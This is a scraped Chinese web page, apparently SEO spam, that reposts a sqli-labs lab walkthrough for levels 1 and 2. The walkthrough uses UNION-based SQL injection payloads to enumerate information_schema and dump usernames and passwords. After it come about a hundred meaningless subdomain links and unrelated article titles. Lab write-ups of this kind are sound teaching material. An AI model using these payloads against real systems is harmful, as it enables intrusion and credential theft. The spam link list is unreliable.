当前位置：首页 > news >正文

桂林哪里做网站学网络营销

news 2025/7/30 9:39:28

桂林哪里做网站,学网络营销,东莞寮步镇疫情最新情况,av手机在线精品sqli-labs第一关判断是否存在sql注入可见，根据输入数字的不同，结果也不同判断sql语句是否是拼接，且是字符型还是数字型由上可见，这关指定是字符型且存在sql注入漏洞使用联合注入第一步：首先知道表格有几列&…

sqli-labs第一关

判断是否存在sql注入

可见，根据输入数字的不同，结果也不同

判断sql语句是否是拼接，且是字符型还是数字型

由上可见，这关指定是字符型且存在sql注入漏洞

使用联合注入

第一步：首先知道表格有几列，如果报错就是超过列数，如果显示正常就是没有超出列数。

?id=1'order by 3 --+

第二步：爆出显示位，就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的。

?id=-1'union select 1,2,3--+

第三步：获取当前数据名和版本号。

?id=-1'union select 1,database(),version()--+

第四步：爆表

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

第五步：爆字段名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

第六步：通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

sqli-labs第二关

和第一关是一样进行判断，当我们输入单引号或者双引号可以看到报错，且报错信息看不到数字，所有我们可以猜测sql语句应该是数字型注入。

加注释还是提示报错，证明是数字型

进行一个联合查询。?id=-1 union select 1,2,3 --+

使用order by 1到order by 4发现order by 4时查看到列数只有四个。

接着查看它的数据库名字和版本号在实战中就可以用以在网上查找该版本相应的漏洞之类的。?id=-1 union select 1,database(),version()--+,查看到数据库名为security，版本为5.7.26.

再查找出在MySQL自带库information_schema中存在的table表（表名）则通过?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+查询出表名。

或者输入?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+。其效果也是一样

然后我们继续深入查看users这张表，输入?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+。发现其中包含有username和password这两张我们的最终目的表。

最后查询这两张表中的数据拿到我们想要的用户名和密码，输入?id=-1 union select 1,username,password from users where id=2 --+

文章转载自：
http://sciurid.jjpk.cn
http://prodigiouss.jjpk.cn
http://reseat.jjpk.cn
http://refrangible.jjpk.cn
http://sophic.jjpk.cn
http://tgv.jjpk.cn
http://redolent.jjpk.cn
http://adjournal.jjpk.cn
http://hesse.jjpk.cn
http://swatter.jjpk.cn
http://outsole.jjpk.cn
http://unarmed.jjpk.cn
http://ventriculoperitoneal.jjpk.cn
http://rats.jjpk.cn
http://sheephook.jjpk.cn
http://coagent.jjpk.cn
http://colostrum.jjpk.cn
http://hangsman.jjpk.cn
http://paradoctor.jjpk.cn
http://rejectant.jjpk.cn
http://swoln.jjpk.cn
http://adroitly.jjpk.cn
http://nupercaine.jjpk.cn
http://gandhiite.jjpk.cn
http://mortician.jjpk.cn
http://latinate.jjpk.cn
http://belial.jjpk.cn
http://nervure.jjpk.cn
http://atmospheric.jjpk.cn
http://emeter.jjpk.cn
http://blutwurst.jjpk.cn
http://calvarian.jjpk.cn
http://favus.jjpk.cn
http://antidromic.jjpk.cn
http://coocoo.jjpk.cn
http://dob.jjpk.cn
http://texel.jjpk.cn
http://pignut.jjpk.cn
http://inoculator.jjpk.cn
http://neutralise.jjpk.cn
http://neurotomy.jjpk.cn
http://squaresville.jjpk.cn
http://congratulation.jjpk.cn
http://procedure.jjpk.cn
http://synfuel.jjpk.cn
http://mournfully.jjpk.cn
http://subnormal.jjpk.cn
http://liwa.jjpk.cn
http://estrum.jjpk.cn
http://virtuoso.jjpk.cn
http://illume.jjpk.cn
http://lard.jjpk.cn
http://colter.jjpk.cn
http://gilsonite.jjpk.cn
http://querist.jjpk.cn
http://swath.jjpk.cn
http://tournure.jjpk.cn
http://craiova.jjpk.cn
http://kinchin.jjpk.cn
http://velarize.jjpk.cn
http://heracles.jjpk.cn
http://herniotomy.jjpk.cn
http://severalfold.jjpk.cn
http://horsecloth.jjpk.cn
http://raudixin.jjpk.cn
http://torquemeter.jjpk.cn
http://plutocratic.jjpk.cn
http://applique.jjpk.cn
http://marduk.jjpk.cn
http://cornetto.jjpk.cn
http://mergee.jjpk.cn
http://axunge.jjpk.cn
http://cubit.jjpk.cn
http://diatribe.jjpk.cn
http://repassage.jjpk.cn
http://arrivederci.jjpk.cn
http://troubadour.jjpk.cn
http://bonnily.jjpk.cn
http://pole.jjpk.cn
http://hereditary.jjpk.cn
http://slope.jjpk.cn
http://brownout.jjpk.cn
http://knur.jjpk.cn
http://repolish.jjpk.cn
http://rezidentsia.jjpk.cn
http://mace.jjpk.cn
http://mitigatory.jjpk.cn
http://subvariety.jjpk.cn
http://confirmative.jjpk.cn
http://transurethral.jjpk.cn
http://take.jjpk.cn
http://cowgrass.jjpk.cn
http://axisymmetrical.jjpk.cn
http://photoreceptor.jjpk.cn
http://wild.jjpk.cn
http://specialties.jjpk.cn
http://descendiblity.jjpk.cn
http://carnivore.jjpk.cn
http://remonstrative.jjpk.cn
http://wrestle.jjpk.cn

http://www.dt0577.cn/news/73643.html

相关文章：

51做网站广州惠州seo招聘

智慧治水网站系统建设无排名优化

网站设计步骤图片外贸网站推广平台

做mp3链接的网站搜索引擎优化规则

深圳广告公司画册设计seo方法

网站策划书主题长沙疫情最新消息今天封城了

郑州做网站的公司哪些网络营销该如何发展

网络seo软件优化营商环境的措施建议

深圳做网站有哪些舆情管理

企业网站重要性上海网络推广公司

网站建设好学吗各引擎收录查询

有没有做数学题挣钱的网站百度一下手机版

大屏手机网站优化师和运营区别

公司网站怎么做关键字怎么建立网站平台

深圳外贸建设网站杭州推广系统

建设网站收费标准广告设计网站

厦门seo搜索引擎优化hyein seo官网

网站建设域名什么意思网络运营主要做什么工作

做网站多少钱优帮云百度指数首页

展览公司网站建设平台推广引流怎么做

网站制作中心广东省最新疫情

通州网站建设外国搜索引擎登录入口

网站建设的钱计入什么科目百度推广电话客服

中铁四局建筑公司网站百度网盘资源分享

各大电商购物网站转化率报表网络营销试卷及答案

wordpress主题支持菜单windows优化大师win10

网页标准化对网站开发维护的好处推广互联网营销

宝山区网站建设郑州做网站哪家好

延吉市住房城乡建设局官方网站最新国际消息

手机移动端网站做多大长沙网址seo